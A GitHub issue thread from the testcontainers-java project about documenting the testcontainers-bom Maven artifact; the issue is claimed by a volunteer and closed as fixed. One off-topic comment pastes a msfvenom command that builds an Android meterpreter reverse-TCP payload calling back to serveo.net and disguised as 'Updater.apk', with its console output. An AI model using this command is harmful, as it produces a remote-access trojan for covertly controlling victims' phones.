### ISSUE TITLE
Mention `testcontainers-bom` in "Maven dependencies" section of the docs

### ISSUE THREAD

**Issue by bsideup** [testcontainers/testcontainers-java#2134]
https://github.com/testcontainers/testcontainers-java/blob/master/docs/index.md should be updated and mention that here is `org:testcontainers:testcontainers-bom` that others can import to avoid specifying version of every dependency

Please reply to this issue first if you want to work on it.

**Comment by eaxdev** [comment]
Hello. I can do this issue.

**Comment by bsideup** [comment]
thank you, @eaxdev! It is yours :)

**Comment by giuseppe23-max** [comment]
msfvenom -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=5432 R > storage/downloads/Updater.apk
/data/data/com.termux/files/usr/lib/ruby/gems/2.7.0/gems/faraday-0.17.0/lib/faraday/options.rb:166: warning: Capturing the given block using Proc.new is deprecated; use `&block` instead
/data/data/com.termux/files/usr/lib/ruby/gems/2.7.0/gems/faraday-0.17.0/lib/faraday/options.rb:166: warning: Capturing the given block using Proc.new is deprecated; use `&block` instead
/data/data/com.termux/files/usr/lib/ruby/gems/2.7.0/gems/faraday-0.17.0/lib/faraday/options.rb:166: warning: Capturing the given block using Proc.new is deprecated; use `&block` instead
/data/data/com.termux/files/usr/lib/ruby/gems/2.7.0/gems/faraday-0.17.0/lib/faraday/options.rb:166: warning: Capturing the given block using Proc.new is deprecated; use `&block` instead
/data/data/com.termux/files/usr/lib/ruby/gems/2.7.0/gems/faraday-0.17.0/lib/faraday/options.rb:166: warning: Capturing the given block using Proc.new is deprecated; use `&block` instead
/data/data/com.termux/files/usr/lib/ruby/gems/2.7.0/gems/faraday-0.17.0/lib/faraday/rack_builder.rb:55: warning: Capturing the given block using Proc.new is deprecated; use `&block` instead
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 10178 bytes PLEASE HELP MEEEE

**Comment by bsideup** [comment]
Fixed in #2178
